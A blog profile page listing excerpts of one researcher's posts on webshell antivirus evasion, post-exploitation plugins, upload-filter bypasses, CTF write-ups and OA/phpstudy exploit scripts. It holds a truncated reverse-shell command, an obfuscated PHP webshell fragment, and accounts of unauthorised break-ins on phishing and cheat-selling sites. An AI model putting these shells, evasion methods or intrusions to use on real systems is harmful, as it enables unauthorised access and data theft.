自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

yzddMr6的博客

yzddmr6.tk

  • 博客(26)
  • 收藏
  • 关注

原创 手机运行Docker: 从修改内核到刷入原生Linux

原文地址:https://yzddmr6.com/posts/android-run-docker/背景最近收拾东西翻出了抽屉里吃灰的小米6。小米6当年可以说是神机一部,最好的835遇到了最好的MIUI9。如今放在抽屉里吃灰实在可惜,想着拿来做点什么让它继续发挥余热。随后就萌生了一个想法:在手机上跑Docker,这样的话就可以用到很多打包好的Docker应用了。后来发现有这个想法的人不止我一...

2022-12-13 21:09:52 3557 3

原创 As-Exploits v1.4更新

@yzddmr6更新日志v 1.4 (2021/7/24)aspx新增 内存马 模块aspx新增 内存马管理 模块jsp新增filter内存马jsp内存马管理模块增强,支持filter、servlet(thx: tomcat-memshell-killer项目)新增 执行自定义payload 模块解决html渲染中文乱码JSP内存马模块增强filter内存马新增filte...

2022-02-27 22:16:11 609

原创 L3HCTF bypass出题人视角

@yzddmr6自己在L3HCTF中出了一道java上传绕过题目bypass。其中题目中的一些trick不仅仅是用于CTF出题,对于实战渗透也是有一定的帮助。今天跟大家分享一下出题时的一些思考跟解题细节。题目有三道过滤1. 绕过后缀public static String checkExt(String ext) { ext = ext.toLowerCase(); ...

2022-02-27 22:15:39 2814

原创 As-Exploits v1.3更新

更新主要内容v 1.3 (2021/5/14)equals支持数组传参方式,兼容各种容器jsp新增 ShellCode加载器模块,内置两种分别基于jna跟java agent的shellcode加载方式jsp新增 Bypass OpenRASP 模块,thx@GodzillaJarLoader模块 新增手动上传方式,解决因Tomcat最大POST长度为2m导致无法加载内存Jar的问题...

2022-02-26 16:18:57 423

原创 As-Exploits v 1.2 更新

前言As-Exploits,中国蚁剑后渗透模块。目前插件的定位是蚁剑的一个微内核拓展模块,可以迅速做到payload的工程化,不用过多时间浪费在插件的结构上。目前的As-Exlpoits各部分之间基本做到了解耦,新增一个payload只需要两步:1.填写payload,2. 画一个表单。其余发包,回显处理等事情框架会自动帮你实现。想要自定义的话只需要继承父类然后重写对应方法即可。其中Payl...

2021-05-15 17:37:09 388

原创 一次jsp上传绕过的思考 --yzddMr6

@yzddmr6@zsxq: websafe背景前几天有个小伙伴做项目的时候遇到一个问题来问我,大概情况如下:jsp的站,可以任意文件上传上传jsp会把<%中的<给转义掉上传jspx会把<jsp:scriptlet>到</jsp:scriptlet>中的内容替换为空问有什么突破办法?image.pngimage.png...

2021-05-15 17:32:07 1777

原创 一个有趣的Shell分析以及自己的一些想法 ——yzddMr6

前言前一段时间有很多同学问我这个shell,看了下确实比较有意思,并且顺便也想讲一些自己的想法。<?php$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p...

2019-12-17 22:07:01 386 1

原创 绕过宝塔云锁注入钓鱼站 ——yzddMr6

前言某天收到一封邮件image一看就是钓鱼邮件,并且我也不玩LOL。看了看感觉这个系统好像见过很多次,研究了一下,顺手日了下来过程比较有意思,遇到了不少坑,写篇文章记录一下。正文信息搜集打开网站首先我们可以看到他的炫酷界面image进一步搜集信息发现有宝塔+云锁,找不到后台,旁站全是这种钓鱼站,均使用了冒充官网的子域名前缀im...

2019-12-07 09:53:22 2712

原创 反弹Shell升级为交互式Shell ——yzddMr6

前言看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。然后一顿操作把一个简单的shell就升级到了一个标准交互式shell写这篇文章记录一下正文攻击机:kali靶机:ubuntu首先ubuntu建一个新用户:test,密码 test普通Shell给kali弹shellbash -i >& /dev/tcp/192.168...

2019-12-03 13:14:56 2476

原创 无限免杀D盾脚本之aspx ——yzddMr6

前言自己曾经写过一篇文章:利用随机异或无限免杀某盾php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章.因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀0x01 主要方法字符串拼接函数数组Base64编码0x02 了解aspx一句话Aspx的一句话一般是使用Jscript语言实...

2019-11-19 22:27:52 3415

原创 WebCrack:一键自动化日站工具 ——yzddMr6

前言当初日学校内网的时候有很多后台,就想着能不能批量检测一下弱口令但是学校的后台系统种类很多,asp aspx php jsp 等等因为单个网站的爆破比较好整,直接上burp或者py脚本或者hydra好像还没有听说过批量工具想着找一找有没有现成的工具能测一测。还真发现github上有一个https://github.com/TideSec/web_pwd_common...

2019-11-19 22:23:34 1802 1

原创 向吃鸡外挂站开炮(二)——yzddMr6

上一篇 向吃鸡外挂站开炮(一)前言首先打开网站我们可以看到他的炫酷界面暖心公告[图片上传失败…(image-cea3c9-1573117670522)]不要脸的宣传词发现注入基于tp3开发,后台/admin尝试万能密码提示密码错误尝试admin admin888 提示账号不存在两者回显不同,考虑可能存在注入无法利用?burp抓包发送到repeater进行...

2019-11-15 15:36:30 267

原创 向吃鸡外挂站开炮(一) ——yzddMr6

前言因为最近吃鸡被外挂打自闭了,所以准备也让那些卖挂的体会一下什么叫做自闭。昨天晚上爬了快1000个卖吃鸡外挂的平台你们这些卖挂的,等我有空了一个一个捶。发现大多数都是用的一套aspx的程序,可惜没有源码不能白盒审计,黑盒也找不到什么洞只能找找软柿子捏昨天晚上一口气锤了四个基本上都有宝塔不过php-venom 4 系列加上配套的编码器过宝塔稳得一批脱了裤子发现里面...

2019-11-15 15:34:53 895

原创 向吃鸡外挂站开炮(三)——yzddMr6

本篇已授权公众号“HACK学习呀”转载向吃鸡外挂站开炮(一)向吃鸡外挂站开炮(二)前言第三篇终于写好了,也算是比较有意思的一篇,遇到了很多坑,也用上了很多小技巧,写出来博君一笑。正文毫无套路的炫酷界面image琳琅满目的商品列表image这种卖黑号的通常都是跟各种hc商勾结在一起,用木马盗取用户账号,然后再出售账号让孤儿开挂。Getsh...

2019-11-14 20:11:24 598 1

原创 2019“黄鹤杯”全国总决赛 WEB Write Up ——yzddMr6

前言三天赶了两场比赛黄鹤杯体验极佳 ,比某500空间好到不知哪里去了web就两个题,一开始就打穿了于是本菜鸡就开始了划水运动hhhhhweb1web1是个thinkphp5扫一下目录有个www.zip打开后看到源码image有注册 有登录按钮,然后看源码的意思是让你成为admin用户,然后可以得到一个hint来进行下一步...

2019-11-09 19:36:48 527

原创 如何优雅的把cmdshell升级为一句话 ——yzddMr6

前言前一段时间致远OA的洞坑了不少公司自己也复现了一下 但是有个很恶心的问题就是 默认的payload是有长度限制的并且只是一个cmd的shellLinux的shell还比较灵活 但是win的来说就不太方便了特别是配合上恶心的url编码在浏览器里面遇到反斜杠就gg那么怎么把cmdshell优雅的转化为可以连接的一句话呢看了以前的帖子大概有这几个办法Js+cscr...

2019-11-09 19:35:05 262

原创 泛微OA管理系统RCE漏洞利用脚本 ——yzddMr6

使用方法python3 rce.py http://www.baidu.comimagepayload是捡的,可以一定程度上bypass waf源码随手撸的import requestsimport sysheaders = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1...

2019-11-09 19:33:40 2926

原创 phpstudy 后门批量利用脚本改良版 ——yzddMr6

前言看到新闻后本来以为影响范围小没多大事。。。直到发现自己的两个电脑全都中招了才意识到问题大了。。。不过还好自己当初安装phpstudy后第一时间关了对外端口,只允许本地127.0.0.1访问并且用的一直是php5.6,完美避开两个后门版本如果不是新闻爆出来谁能想到这玩意还有后门。。。awsl,这谁顶得住啊。后门检测后门版本:phpStudy2016 和 phpS...

2019-11-07 17:00:02 621

原创 webshell-venom 3.2 :免杀D盾无压力 ——yzddMr6

前言感谢大家对webshell-venom的支持星球自开启以来已经源源不断有各路大佬加入并且一起交流了很多的思路跟想法为了不辜负大家的期望自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更项目在今天也达到了700个星image所以特地推出webshell-venom 3.2版本webshell-venom 3.2 的蚁剑插件版也已经在蚁剑商...

2019-11-07 16:47:30 2083 1

原创 hexo-hey 修改上传图片为相对路径 ——yzddMr6

前言做个记录正文自己的博客采用了hexo-hey来管理,还是挺方便的。但是一直有个问题就是上传图片的问题。如果你在站点主配置文件中设置了urlimagehexo-hey就会默认把你在本地编辑图片的路径前面加上你的url所以就变成了这个样子image因为你是在localhost调试后才发布出去,所以此时你的网站上并没有这张图片所以就出现了...

2019-11-07 16:44:12 1081

原创 WebCrack:网站后台弱口令批量检测工具 ——yzddMr6

经过这么长时间的测试终于算是可以上线了,写篇文章跟大家分享一下自己的开发思路吧注:本工具借鉴吸收了TideSec的web_pwd_common_crack很多优秀的思路,在此基础上增加了很多拓展功能使其更加强大,在这里给TideSec的大佬点个赞!前言在做安全测试的时候,随着资产的增多,经常会遇到需要快速检测大量网站后台弱口令的问题。然而市面上并没有一个比较好的解决...

2019-11-06 14:48:24 2832 3

原创 一键免杀D盾(webshell-venom 3.0 发布) ——yzddMr6

前言我承诺过300个星后放出3.0项目地址:https://github.com/yzddmr6/webshell-venomwebshell-venom 3.0 更新特点:1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接,故去除头部的404,如有需要自行添加2. 变量全员随机化,不再有固定的变量名称3. 增...

2019-11-06 14:43:54 1723 1

原创 一键免杀D盾(免杀一句话无限生成) ——yzddMr6

前言最近逛帖子发现好多人还在找各种免杀一句话。。。都9102年了 都不知道有webshell-venom这个东西吗。。。看来我的宣传还是不到位。。。再给大家介绍一下吧项目地址:https://github.com/yzddmr6/webshell-venom蚁剑插件版:https://github.com/yzddmr6/as_webshell_venom自己几个...

2019-11-06 14:41:54 1591

原创 利用随机异或无限免杀d盾 2.0 ——yzddMr6

随机异或脚本 2.0更新内容1. 更新免杀2. 解决了PHP5.4以下没有hex2bin函数的BUG3. 在变量池中去除导致脚本不能使用的转义符\4. 精简体积 370字节->270字节5. Header改为404,更为隐蔽其实上一篇文章写之前就已经有了心理准备上次发的脚本自己用了几个月没事发出来不到一个星期就不免杀了image...

2019-11-06 14:40:20 192

原创 利用随机异或无限免杀d盾 ——yzddMr6

前言最近D盾更新了,在某司某圈也看到了不少免杀d盾免杀狗的一句话帖子但是基本上只要放出来不到两天时间就加入查杀全家桶.最近一直在造各种车轮子就想着其实可以写个脚本利用异或来fuzz出指定的字符然后拼接出assert或者create_function等函数,来对抗waf的检测.思路及实现首先如何fuzz的问题先讲一个离散数学中的概念叫可逆 ,异或的运算就是具有可逆性的....

2019-11-06 14:38:21 293

原创 Hello World

在简书做一个博客的镜像原博客: https://yzddmr6.tk

2019-11-05 08:26:51 150

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除